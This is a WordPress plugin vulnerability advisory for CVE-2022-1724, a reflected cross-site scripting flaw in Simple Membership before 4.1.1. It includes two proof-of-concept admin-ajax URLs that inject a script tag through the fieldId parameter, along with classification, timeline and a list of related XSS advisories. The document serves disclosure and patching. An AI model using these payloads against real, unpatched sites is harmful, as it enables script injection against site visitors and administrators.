Simple Membership < 4.1.1 – Reflected Cross-Site Scripting | CVE 2022-1724 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_user_name&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Affects Plugins

simple-membership

Fixed in 4.1.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

96a0a667-9c4b-4ea6-b78a-0681e9a9bbae

Timeline

Publicly Published

2022-05-23 (about 1 years ago)

Added

2022-05-23 (about 1 years ago)

Last Updated

2023-02-18 (about 1 years ago)

Other

Published

Title

Published

2023-05-09

Title

Vertical Image Slider < 1.2.17 - Reflected XSS

Published

2013-10-08

Title

Quick Contact Form 6.0 - Stored XSS

Published

2018-02-20

Title

Ninja Forms <= 3.2.13 - Cross-Site Scripting (XSS)

Published

2024-01-15

Title

CformsII < 15.0.7 - Unauthenticated Stored XSS

Published

2014-08-01

Title

Register Plus Redux <= 3.8.3 - Cross-Site Scripting (XSS)